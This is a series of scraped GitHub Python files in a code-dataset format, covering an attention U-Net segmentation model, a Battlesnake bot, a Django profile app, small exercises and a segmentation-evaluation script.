super(Unet_Decoder, self).__init__()\n self.decoder_output = nn.ModuleList()\n encoder_channels = encoder_channels[::-1]\n array_1 = encoder_channels[:-1]\n array_2 = encoder_channels[1:]\n\n for i, (in_ch, out_ch) in enumerate(zip(array_1, array_2)):\n next_up = Up_Atten(in_ch, out_ch) \n 
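# Each Up_Atten stage upsamples by 2, gates the skip connection with an\n            # attention block, then fuses both paths with a double convolution.\n            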
self.decoder_output.append(next_up)\n self.dropout = nn.Dropout2d(dropout)\n self.out_conv = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n OutConv(encoder_channels[-1], n_classes)\n )\n\n channels = [n_classes]\n channels += [feature.out_ch for feature in list(reversed(self.decoder_output))]\n self.channels = channels\n init_weights(self)\n \n def forward(self, encoder_features): \n decoder_features = [] \n reverse_features = encoder_features[::-1] \n up_decode = reverse_features[0]\n for i, feature in enumerate(reverse_features[1: ]):\n out_decode = self.decoder_output[i](up_decode, feature)\n decoder_features.append(out_decode)\n up_decode = out_decode\n final = self.dropout(up_decode)\n final = self.out_conv(final)\n decoder_features.append(final)\n return list(reversed(decoder_features))\n # return final\n\nclass Attention_Unet(nn.Module):\n \"\"\"\n Attention Unet with pretrained model.\n Resnet18, resnet34, resnet50, resnet101, wide_resnet, ... from timm package\n \"\"\"\n def __init__(self, n_classes, dropout, deep_supervision:bool, encoder: nn.Module):\n super(Attention_Unet, self).__init__()\n \n self.encoder = encoder\n encoder_channels = self.encoder.filters\n self.decoder = Unet_Decoder(encoder_channels, n_classes, dropout)\n self.deep_supervision = deep_supervision\n # if deep_supervision:\n self.supervision = nn.ModuleList([OutConv(channels, n_classes) for channels in self.decoder.channels])\n\n def forward(self, x):\n x, pad = pad_image_tensor(x, 32)\n H, W = x.size(2), x.size(3)\n\n #Encode\n encoder_outputs = self.encoder(x)\n #Decode\n decoder_outputs = self.decoder(encoder_outputs)\n # if the input is not divisible by the output stride\n final = decoder_outputs[0]\n if final.size(2) != H or final.size(3) != W:\n final = F.interpolate(final, size=(H, W), mode=\"bilinear\", align_corners=True)\n \n final = unpad_image_tensor(final, pad)\n prediction_list = []\n if self.deep_supervision:\n for feature_map, supervision in zip(decoder_outputs, self.supervision):\n prediction = supervision(feature_map)\n prediction_list.append(prediction)\n \n return final, prediction_list[1: ]\n else:\n return final\n\n def get_num_parameters(self):\n trainable= int(sum(p.numel() for p in self.parameters() if p.requires_grad))\n total = int(sum(p.numel() for p in self.parameters()))\n return trainable, total\n \n def get_paramgroup(self, base_lr=None, weight_decay=1e-5):\n lr_dict = {\n \"encoder\": [0.1, weight_decay],\n }\n \n lr_group = get_lr_parameters(self, base_lr, lr_dict)\n return lr_group\n\ndef seresnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='seresnet50', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef seresnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='seresnet50', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef resnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='resnet50', 
freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef efficientnetb2_attunet(input_channels = 3, num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='tf_efficientnet_b2', freeze_backbone=freeze_backbone, pretrained=pretrained)\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef mobilenetv3_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='mobilenetv3_large_100', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder)\n\ndef swin_tiny_attunet(num_classes=1, drop_rate=0.25, drop_block_rate=0.1, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(backbone='swin_tiny_patches4_window7_224', freeze_bn=freeze_bn, freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, drop_block_rate=drop_block_rate, deep_supervision=deep_supervision, encoder=encoder)\n\ndef swin_small_attunet(num_classes=1, drop_rate=0.25, drop_block_rate=0.1, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(backbone='swin_small_patches4_window7_224', freeze_bn=freeze_bn, freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, drop_block_rate=drop_block_rate, deep_supervision=deep_supervision, encoder=encoder)\n\nif __name__ == '__main__':\n model = resnet50_attunet(1, deep_supervision=True).cuda()\n a = torch.randn(1, 3, 1024, 1024).cuda()\n output, deep_output = model(a)\n # for o in output:\n # print(o.shape\n # \n # )\n print(output.shape)\n for fea in deep_output:\n print(fea.shape)\n # decoder = model.decoder\n # decoder_fea = decoder.channels\n # for chn in decoder_fea:\n # print(chn)\n","repo_name":"duylebkHCM/EyeDiseaseSegmentation","sub_path":"src/main/archs/attentionunet.py","file_name":"attentionunet.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26669696414","text":"\"\"\"\nCreated on May 3, 2018\n\n@author: Thomas Hopkins and Rania Jameel\n\"\"\"\nfrom tkinter import *\n\n\nclass Credits(Frame):\n \"\"\"A window for showing project credits.\"\"\"\n def __init__(self):\n # Setup the window frame (Title, grid, etc)\n Frame.__init__(self)\n self.option_add('*Font', 'arial 12')\n self.pack(expand=YES)\n self.text = \"\"\"\nCreated by Thomas Hopkins\n and Rania Jameel\n\nUses dependencies:\n SymPy (www.sympy.org)\n numpy (www.numpy.org)\n\nSpecial thanks to:\n Professor McKanry (Rex)\n\n\n\n\n\n\n\n\n\n\n\n\n 2018\n\"\"\" \n self.creditslabel = Label(self, text=self.text, justify='left')\n self.creditslabel.pack()\n","repo_name":"Thomas-Hopkins/Python-FinalProject-Fall2018","sub_path":"src/calculatorCredits.py","file_name":"calculatorCredits.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
+{"seq_id":"29053063232","text":"class Solution:\n def numberOfRounds(self, loginTime: str, logoutTime: str) -> int:\n\n login = int(loginTime[:2]) * 60 + int(loginTime[3:])\n logout = int(logoutTime[:2]) * 60 + int(logoutTime[3:])\n\n if logout < login:\n logout += 24 * 60\n\n while login % 15:\n login += 1\n\n while logout % 15:\n logout -= 1\n\n return max((logout - login) // 15, 0)\n\n# Time: O(1)\n# Space: O(1)\n","repo_name":"kutaycinar/leetcode","sub_path":"python/1904_the-number-of-full-rounds-you-have-played.py","file_name":"1904_the-number-of-full-rounds-you-have-played.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5336075790","text":"import json as j\nimport yaml as y\nfrom uhclib import itemenc, kitenc\n\ndef main(ifile, ofile):\n\titem = str();\n#\tcase = int(ifile.readline().strip(\"\\n\"));\n\tkits = dict();\n\twhile True:\n\t\tpro = ifile.readline();\n\t\twhile pro == '\\n':\n\t\t\tpro = ifile.readline();\n\t\tpro = pro.strip(\"\\n\");\n\t\tif pro[0] == '0':\n\t\t\tbreak;\n\t\tif pro.find(\"(\")==-1:\n\t\t\tpro = pro.split();\n\t\t\tcitem = int(pro[0]);\n\t\t\tidn = pro[1];\n\t\t\titem = itemenc(pro[2]);\n\t\t\tname = pro[3];\n\t\telse:\n\t\t\tpros = pro.split();\n\t\t\tcitem = int(pros[0]);\n\t\t\tidn = pros[1];\n\t\t\tname = pros[-1];\n\t\t\titem = str();\n\t\t\tfor i in pros[2:-1]:\n\t\t\t\titem += i;\n\t\t\titem = itemenc(item);\n\t\titems = list();\n\t\tfor cnti in range(citem):\n\t\t\tkitem = ifile.readline().strip(\"\\n\");\n\t\t\tind = kitem.rfind(' ');\n#\t\t\tsitem = kitem.split();\n\t\t\tif (ind!=-1) and (kitem[ind+1:].isdigit()):\n\t\t\t\titems.append(itemenc(kitem[:ind], int(kitem[ind+1:])));\n\t\t\telse:\n\t\t\t\titems.append(itemenc(kitem));\n\t\t\n\t\tkit = kitenc(item, name, items);\n\t\tkits[idn] = kit;\n\t\n\tofile.write(y.dump({\"kits\":kits}));\n\nif __name__ == \"__main__\":\n\tifile = open(\"kits.in\", \"r\");\n\tofile = open(\"kits.yml\", \"w\");\n#\tifile = open(input(\"input file:\"), \"r\");\n#\tofile = open(input(\"output file:\"), \"w\");\n\tmain(ifile, ofile);\n\tifile.close();\n\tofile.close();\n\tprint(\"解析完成,已存储为 kits.yml\\n是否写入 ./plugins/UhcCore/kits.yml [Y/n] : \", end='')\n\tif input()[0]=='Y':\n\t\tifile = open(\"kits.in\", \"r\");\n\t\tofile = open(\"plugins/UhcCore/kits.yml\", \"w\");\n\t\tmain(ifile, ofile);\n\t\tifile.close();\n\t\tofile.close();\n\n","repo_name":"HuashuiZhuanyong/UhcCoreHelper","sub_path":"kits.py","file_name":"kits.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"23435243142","text":"from utils.MarbalRunner import MarbalRunner\nimport time\nimport datetime\nif __name__==\"__main__\":\n init_pos=[30.0,20.0,np.pi/2]\n robot = MarbalRunnerST(init_pos,[0,0])\n t=1\n initialT = datetime.datetime.now()\n while 1:\n robot._updateLoc()\n v_desired = 0.5\n w_desired = 0 #desired w to face to the target\n print(\"desired val\",v_desired,w_desired)\n duty_cycle_l, duty_cycle_r = robot.robot_controller.drive(v_desired,w_desired,robot.w[0],robot.w[1]) #contorl\n robot._pwmL.value = abs(duty_cycle_l)\n robot._pwmR.value = abs(duty_cycle_r)\n robot._setDirL(duty_cycle_l>0)\n robot._setDirR(duty_cycle_r>0)\n time.sleep(2*CONST.dt)\n if (datetime.datetime.now()-initialT)>t:\n break\n print(robot.pos)\n\n robot._pwmL.value = 0\n robot._pwmR.value = 0\n\n 
","repo_name":"AndyLi-26/Marble_collector","sub_path":"tests/goStraightTest.py","file_name":"goStraightTest.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39180012164","text":"\"\"\"Write code that translates a name into (simplified) Pig Latin. \n(Please do not make this a 'real' Pig Latin translator.) \nHave your script ask the user for his or her name, which can comprise \nfirst, middle, and/or last parts. For each name part, move the first letter to \nthe end of the part and append the letters \"ay\". Make sure that only the first \nletter of each word in your output is capitalized. You can use the split() \nmethod on the string to create a list of the name parts. Be sure that your \nscript can handle one, two or three name parts separated by spaces. \nThis will likely involve a loop.\nYour script should re-create the following example exactly:\n \nEnter your name: Paul Laskowski\n\nAulpay Askowskilay\"\"\"\n# User enters their name.\nname_input = input('Please enter your name: ')\nprint('\\n')\n# Create a list from user input, split the name between the spaces.\nname_list = name_input.split(' ')\n# Determine the number of items in the list.\ni = 0\nj = len(name_list)\nwhile i < j:\n name_pig_latin = name_list[i][1].upper() + name_list[i][2:].lower() + \\\n name_list[i][0].lower() + 'ay'\n print(name_pig_latin, end=' ')\n i += 1","repo_name":"sagotechnology/Data-Science-Programming","sub_path":"05_Course-Content/week_03/python_programs/pig_latin_translator.py","file_name":"pig_latin_translator.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36174254588","text":"# This will deal with the movement of the snake\nimport snakeinfo as si\nimport getFood\nfrom pathfinding.core.diagonal_movement import DiagonalMovement\nfrom pathfinding.core.grid import Grid\nfrom pathfinding.finder.a_star import AStarFinder\nfrom pathfinding.finder.best_first import BestFirst\nfrom pathfinding.finder.bi_a_star import BiAStarFinder\ndirections = ['up', 'down', 'left', 'right']\n\ndef followTail(x, y):\n tailX = x\n tailY = y\n tailPoint = (tailX, tailY)\n return tailPoint\n\ndef checkHealth(health):\n if health >= 80:\n print(\"true\")\n return True\n\n\ndef findFood(board, x, y):\n foodToEat = (board.food[1]['x'],board.food[1]['y'])\n for food in board.food:\n if((abs(food['x'] - x) + abs(food['y'] - y)) < abs((foodToEat[0] - x) + abs(foodToEat[1] - y))):\n foodToEat = (food['x'], food['y'])\n return foodToEat\n \n\ndef is_empty(any_structure):\n if any_structure:\n print('Structure is not empty.')\n return False\n else:\n print('Structure is empty.')\n return True\n\ndef generatePath(grid, data):\n grid = Grid(matrix=grid)\n \n \n # Board class declaration\n board = si.board (\n data['board']['height'], \n data['board']['width'],\n data['board']['food'],\n data['board']['snakes'],\n data['board']['snakes'][0]\n )\n \n width = board.width\n height = board.height\n foodPos = board.food\n allSnakes = board.snakes\n enemyHealth = board.health\n\n # Our snakes class declaration\n ourSnake = si.ourSnake (\n data['you']['id'],\n data['you']['name'],\n data['you']['health'],\n data['you']['body'],\n data['you']['body'][0]['x'],\n data['you']['body'][0]['y'],\n data['you']['body'][-1]['x'],\n data['you']['body'][-1]['y']\n )\n\n # for snake in board.snakes:\n # print(snake)\n # print(board.food)\n # 
print(data)\n sid = ourSnake.sid\n name = ourSnake.name\n ourHealth = ourSnake.health\n ourBody = ourSnake.body\n ourX = ourSnake.x\n ourY = ourSnake.y\n tailX = ourSnake.tailX\n tailY = ourSnake.tailY\n start = grid.node(ourX, ourY)\n\n if(len(board.food) == 0):\n state = 3\n print(ourBody)\n if (len(ourBody) > 3 and (ourHealth >= 50)):\n print(\"In Second State\")\n state = 2\n else:\n state = 1\n\n tailPoint = followTail(tailX, tailY)\n # foodToEat[0], foodToEat[1]\n \n # print(tailPoint[1])\n # print(ourHealth)\n # if (checkHealth(ourHealth)):\n # state = 2\n foodToEat = findFood(board, ourX, ourY)\n end = grid.node(foodToEat[0], foodToEat[1])\n finder = BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n\n if(state == 1):\n print(\"state 1\")\n foodToEat = findFood(board, ourX, ourY)\n print (tailPoint)\n end = grid.node(foodToEat[0], foodToEat[1])\n state = 2\n\n elif(state == 2):\n print(\"state 2\")\n end = grid.node(tailPoint[0], tailPoint[1])\n\n elif(state == 3):\n print(\"state 3\")\n end = grid.node(tailPoint[0], tailPoint[1])\n \n finder = BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n path, runs = finder.find_path(start, end, grid)\n print(path)\n next_path = path[1] \n if (is_empty(next_path)):\n print(\"Invalid Move.... Remapping\")\n end = grid.node(tailPoint[0], tailPoint[1])\n finder =BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n path, runs = finder.find_path(start, end, grid)\n\n # print(start)\n # print(next_path)\n # print(next_path[0], next_path[1])\n # print(start.x + 1)\n print ('operations: ', runs, 'path length: ', len(path))\n print(grid.grid_str(path=path, start=start, end=end))\n\n if (next_path[0] == start.x + 1):\n # print (\"Right?\")\n return 3\n\n elif (next_path[0] == start.x - 1):\n # print (\"Left\")\n return 2\n \n elif (next_path[1] == start.y + 1):\n # print (\"Up\")\n return 1\n\n else:\n # print (\"Down\")\n return 0\n\n","repo_name":"LiyaniL/Battlesnake-2019","sub_path":"app/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74816647781","text":"\"\"\"exercise\"\"\"\n\ndef grep(pattern, flags, files):\n \"\"\"\n :param pattern:\n :param flags:\n :param files:\n :return:\n \"\"\"\n\n flags = set(flags.split(' '))\n\n matches = []\n\n for file in files:\n included = False\n with open(file, encoding=\"utf-8\") as handle:\n for line, text in enumerate(handle.readlines()):\n if \"-i\" in flags and \"-x\" in flags:\n matched = pattern.lower() == text.lower().rstrip()\n elif \"-i\" in flags:\n matched = pattern.lower() in text.lower()\n elif \"-x\" in flags:\n matched = pattern == text.rstrip()\n else:\n matched = pattern in text\n\n if \"-v\" in flags:\n matched = not matched\n\n if matched:\n if \"-l\" in flags:\n text = file + \"\\n\"\n matched = True if not included else False\n included = True\n elif \"-n\" in flags:\n text = f'{line+1}:{text}'\n\n if len(files) > 1 and not \"-l\" in flags:\n text = f'{file}:{text}'\n\n if matched:\n matches.append(text)\n\n return \"\".join(matches)\n","repo_name":"Tedford/Exercism","sub_path":"python/grep/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12353615948","text":"\"\"\"Acre URL 
{"seq_id":"12353615948","text":"\"\"\"Acre URL Configuration\n\"\"\"\nfrom api import views as api_views\nfrom django.urls import include, path\nfrom rest_framework_swagger.views import get_swagger_view\n\napi_v1_patterns = [\n    path('docs/', get_swagger_view(title='Acre API')),\n    path('instruments', api_views.InstrumentsView.as_view()),\n    path('trading_day/current', api_views.get_current_trading_day),\n    path('algos', api_views.get_all_algos),\n    path('algos/update/end_of_day', api_views.end_of_day_update),\n    path('algos/update/clean', api_views.clean_predictions),\n    path('algos/<algo_id>/profitable_changes',\n         api_views.ProfitableChangesView.as_view()),\n    path('algos/<algo_id>/predicted_changes',\n         api_views.PredictedChangesView.as_view()),\n]\n\nurlpatterns = [\n    path('v1/', include(api_v1_patterns)),\n]\n","repo_name":"yizhang7210/Acre","sub_path":"server/acre/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"29235146729","text":"# logarithmic complexity: binary search\nfrom LIB.tm import pstopwatch\nfrom funcs import *\n\nprint( 'Creating lists...' )\nlst1 = list ( range(10_000) )\nlst2 = list ( range(100_000) )\nlst3 = list ( range(1000_000) )\nlst4 = list ( range(100_000_000) )\nprint( 'Lists created.\\n\\n' )\n\n# search the lists\nt1, ind1 = pstopwatch( bin_search, lst1, 567, title='Searching 10 thousand numbers...' )\nt2, ind2 = pstopwatch( bin_search, lst2, 5678, title='Searching 100 thousand numbers...' )\nt3, ind3 = pstopwatch( bin_search, lst3, 56789, title='Searching 1 million numbers...' )\nt4, ind4 = pstopwatch( bin_search, lst4, 5678987, title='Searching 100 million numbers...' )\n\n# print the results\nprint( 'For 10 thousand: \\t{:.12f} (index {})'.format(t1, ind1) )\nprint( 'For 100 thousand: \\t{:.12f} (index {})'.format(t2, ind2) )\nprint( 'For 1 million: \\t{:.12f} (index {})'.format(t3, ind3) )\nprint( 'For 100 million: \\t{:.12f} (index {})'.format(t4, ind4) )\n\n\n","repo_name":"AlchiProMent/PythonPro","sub_path":"timings/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
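`bin_search` above is imported from a `funcs` module that is not shown. A plausible iterative implementation consistent with how it is called (sorted list in, index out) would be:

def bin_search(items, target):
    lo, hi = 0, len(items) - 1
    while lo <= hi:
        mid = (lo + hi) // 2
        if items[mid] == target:
            return mid
        if items[mid] < target:
            lo = mid + 1
        else:
            hi = mid - 1
    return -1  # not found

assert bin_search(list(range(10_000)), 567) == 567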
{"seq_id":"35929658269","text":"def check(sp, tp):\n    s = set()\n    for i in range(len(sp)):\n        ys, xs = sp[i]\n        yt, xt = tp[i]\n        s.add((ys-yt, xs-xt))\n\n    return len(s) == 1\n\ndef rotate(sp):\n    ret = []\n\n    for y, x in sp:\n        ret.append((x, N-y-1))\n\n    return ret\n\nN = int(input())\nS = [list(input()) for _ in range(N)]\nT = [list(input()) for _ in range(N)]\nsp = []\ntp = []\nfor i in range(N):\n    for j in range(N):\n        if S[i][j] == \"#\":\n            sp.append((i, j))\n        if T[i][j] == \"#\":\n            tp.append((i, j))\ntp.sort()\n\nif len(sp) != len(tp):\n    print(\"No\")\n    exit()\n\ndef debug(sp):\n    print()\n    for i in range(N):\n        for j in range(N):\n            if (i, j) in sp:\n                print(\"#\", end=\"\")\n            else:\n                print(\".\", end=\"\")\n        print()\n    print()\n\nfor i in range(4):\n    # debug(sp)\n    if check(sorted(sp), tp):\n        print(\"Yes\")\n        exit()\n    sp = rotate(sp)\n\nprint(\"No\")\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc218_c.py","file_name":"abc218_c.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"3436793105","text":"from django.db import models\n\n# project settings\nfrom django.conf import settings\n\n# User model from django auth app\nfrom django.contrib.auth.models import User\n\n# generic relation\nfrom django.contrib.contenttypes.fields import GenericRelation\n\n# timezone\nfrom django.utils import timezone\n\n# reverse the parent content\nfrom django.urls import reverse\n\n# PIL\nfrom PIL import Image\n\nfrom feedaggregate.models import RemoteFeed\n\n\nclass Interest(models.Model):\n    INTEREST_CHOICES = [\n        (0,'Science'),\n        (1,'Maths'),\n        (2,'Computer'),\n        (3,'History'),\n        (4,'Health'),\n    ]\n    interest_id = models.PositiveSmallIntegerField(\n        choices = INTEREST_CHOICES,\n        primary_key= True,\n    )\n\n    def __str__(self):\n        return self.get_interest_id_display()\n\n\nclass Profile(models.Model):\n    '''\n    Profile specifies the Profile table in the database.\n    Here the attributes are:\n    - user: foreign key to User model defined in the admin app\n    - profile_picture: image of the profile\n\n    It refers to the social profile of the user. These fields are\n    extensible for future.\n    '''\n    WORKING_STATUS_CHOICES= [\n        ('student', 'Student'),\n        ('teacher', 'Teacher'),\n        ('none', 'Prefer not to say'),\n    ]\n\n    user = models.OneToOneField(\n        User,\n        on_delete=models.CASCADE,\n        related_name='profile',\n        primary_key=True\n    )\n    profile_picture = models.ImageField(\n        upload_to='profile_picture',\n        blank=True,\n        null= True\n    )\n    following = models.ManyToManyField(\n        'self',\n        through='Follow',\n        related_name='followers',\n        symmetrical=False\n    )\n    bio = models.TextField(blank = True, null = True)\n    current_status = models.CharField(\n        max_length=10,\n        choices = WORKING_STATUS_CHOICES,\n        blank = True, null = True\n    )\n    interest = models.ManyToManyField(\n        Interest\n    )\n    contact_email = models.EmailField(max_length=255,blank=True,null=True)\n\n    remote_feed = GenericRelation(RemoteFeed,related_name=\"remotefeed\",related_query_name=\"feed_creator\")\n\n    def get_absolute_url(self):\n        '''\n        This method when applied to Profile object in templates as\n        object.get_absolute_url (default) will dynamically generate detail\n        view url associated with profile username.\n        '''\n        return reverse('user_detail', kwargs={'username':self.user.username})\n\n    def get_followers(self):\n        return self.following.all()\n\n    def get_followings(self):\n        return Profile.objects.filter(followers=self).all()\n\n    # def save(self, *args, **kwargs):\n    #     super().save(*args, **kwargs)\n    \n    #     profile_img = Image.open(self.profile_picture.path)\n    \n    #     if profile_img.width > 400 or profile_img.height > 400:\n    #         crop_size = (400,400)\n    #         profile_img.thumbnail(crop_size)\n    #         profile_img.save(self.profile_picture.path)\n\n    def __str__(self):\n        return f\"{self.user.username}\"\n\n\nclass Follow(models.Model):\n    profile_from = models.ForeignKey(\n        Profile,\n        on_delete=models.CASCADE,\n        related_name='follow_from',\n    )\n    profile_to = models.ForeignKey(\n        Profile,\n        on_delete=models.CASCADE,\n        related_name='follow_to',\n    )\n    created_on = models.DateTimeField(\n        auto_now_add=True,\n        db_index=True)\n\n    \n    class Meta:\n        ordering = ('-created_on',)\n\n\n    def __str__(self):\n        return f'{self.profile_from} follows {self.profile_to}'\n\n\n","repo_name":"azwyane/Patralaya","sub_path":"apps/profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"}
+{"seq_id":"22549740867","text":"\"\"\"Merges output from Morfeusz with reference data.\"\"\"\nfrom argparse import ArgumentParser\nfrom typing import List, Tuple\n\nimport jsonlines\n\nfrom ktagger import KText\n\n\n\n\ndef get_input_paragraphs(path):\n    segments = []\n    with open(path) as f:\n        for line in f:\n            
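# Usage sketch for the Profile/Follow models above: because `following`
# declares a `through` model, edges are created on Follow directly
# (profiles `alice` and `bob` are assumed to exist; my example, not the
# repo's code):
#
#     Follow.objects.create(profile_from=alice, profile_to=bob)
#     alice.following.all()   # profiles alice follows (source FK: profile_from)
#     bob.followers.all()     # reverse accessor from related_name='followers'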
line = line.rstrip()\n if line == '':\n yield segments\n segments = []\n else:\n fields = line.split('\\t')\n assert len(fields) == 7\n token = fields[0]\n ambig = int(fields[5])\n pred = int(fields[6])\n segments.append((token, ambig, pred))\n if segments:\n yield segments\n return segments\n\n\ndef paragraphs(path):\n segments = []\n with open(path) as f:\n for line in f:\n line = line.rstrip()\n if line == '':\n yield segments\n segments = []\n else:\n fields = line.split(' ')\n # print(len(fields), fields)\n assert len(fields) in (3, 4)\n token = fields[0]\n pred = int(fields[2])\n segments.append((token, pred))\n if segments:\n yield segments\n return segments\n\n\ndef get_reference_offsets(paragraph: KText):\n text = ''\n end_offsets = []\n last_offset = 0\n for token in paragraph.tokens:\n if token.has_disamb() or len(token.interpretations)==0: # in UGC missing interpretations\n form = token.form.replace(' ', '')\n end_offsets.append((last_offset, last_offset + len(form)))\n last_offset += len(form)\n text += form\n return end_offsets, text\n\n\ndef get_predicted_offsets(paragraph: List[Tuple[str, int]]):\n text = ''\n end_offsets = []\n last_offset = 0\n last_start_offset = 0\n for token, decision in paragraph:\n text += token\n if decision == 1:\n end_offsets.append((last_start_offset, last_offset + len(token)))\n last_start_offset = last_offset + len(token)\n last_offset += len(token)\n return end_offsets, text\n\n\ndef get_input_offsets(paragraph: List[Tuple[str, int, int]]):\n text = ''\n end_offsets = []\n last_offset = 0\n last_start_offset = 0\n for token, ambig, decision in paragraph:\n token = token.replace(' ', '')\n text += token\n if decision == 1:\n end_offsets.append((last_start_offset, last_offset + len(token)))\n last_start_offset = last_offset + len(token)\n last_offset += len(token)\n return end_offsets, text\n\n\ndef get_input_unambig_offsets(paragraph: List[Tuple[str, int, int]]):\n text = ''\n unambig_offsets = []\n last_offset = 0\n prev_ambig = False\n for token, ambig, decision in paragraph:\n text += token\n if ambig == 0:\n if not prev_ambig:\n unambig_offsets.append((last_offset, last_offset + len(token)))\n prev_ambig = False\n else:\n prev_ambig = True\n last_offset += len(token)\n return unambig_offsets, text\n\ndef get_input_wospace_offsets(paragraph: List[Tuple[str, int, int]]): #TODO\n text = ''\n unambig_offsets = []\n last_offset = 0\n prev_ambig = False\n for token, ambig, decision in paragraph:\n text += token\n if ambig == 0:\n if not prev_ambig:\n unambig_offsets.append((last_offset, last_offset + len(token)))\n prev_ambig = False\n else:\n prev_ambig = True\n last_offset += len(token)\n return unambig_offsets, text\n\ndef score(tp, fp, fn):\n print(f\"TP: {tp} FP: {fp} FN: {fn}\")\n precision = tp / (tp + fp) if tp + fp > 0 else 0.0\n recall = tp / (tp + fn) if tp + fn > 0 else 0.0\n f1 = 2 * precision * recall / (precision + recall) if precision + recall > 0 else 0.0\n print(f\"Precision: {precision * 100:.4f} Recall: {recall * 100:.4f} F1: {f1 * 100:.4f}\")\n return precision, recall, f1\n\n\ndef calculate(disamb_path, pred_path, ambig_path):\n if 'jsonl' in disamb_path:\n reference_paragraphs = []\n with jsonlines.open(disamb_path) as reader:\n for data in reader:\n ktext = KText.load(data)\n # ktext.find_ambiguous_end_offsets()\n reference_paragraphs.append(ktext)\n\n refs = {}\n for ref in reference_paragraphs:\n ref_offsets, text = get_reference_offsets(ref)\n refs[text] = set(ref_offsets)\n elif 'tsv' in disamb_path:\n 
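# Toy check of the offset convention used throughout this script: a token
# carries decision 1 where a predicted segment ends, so ("ab", 0), ("c", 1)
# yields a single span covering "abc" (my example, runnable against
# get_predicted_offsets as defined above):
#
#     spans, text = get_predicted_offsets([("ab", 0), ("c", 1)])
#     assert (spans, text) == ([(0, 3)], "abc")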
reference_paragraphs = list(get_input_paragraphs(disamb_path))\n        refs = {}\n        for pred in reference_paragraphs:\n            input_offsets, text = get_input_offsets(pred)\n            refs[text] = set(input_offsets)\n\n    predicted_paragraphs = list(paragraphs(pred_path))\n    assert len(predicted_paragraphs) == len(reference_paragraphs)\n    input_paragraphs = list(get_input_paragraphs(ambig_path))\n    assert len(predicted_paragraphs) == len(input_paragraphs)\n\n    preds = {}\n\n    input_refs = {}\n    unambigs = {}\n    for pred in predicted_paragraphs:\n        pred_offsets, text = get_predicted_offsets(pred)\n        preds[text] = set(pred_offsets)\n\n    for pred in input_paragraphs:\n        unambig_offsets, text = get_input_unambig_offsets(pred)\n        unambigs[text] = set(unambig_offsets)\n\n    for pred in input_paragraphs:\n        input_offsets, text = get_input_offsets(pred)\n        input_refs[text] = set(input_offsets)\n\n    print(\"\\n\".join(sorted(preds.keys() - 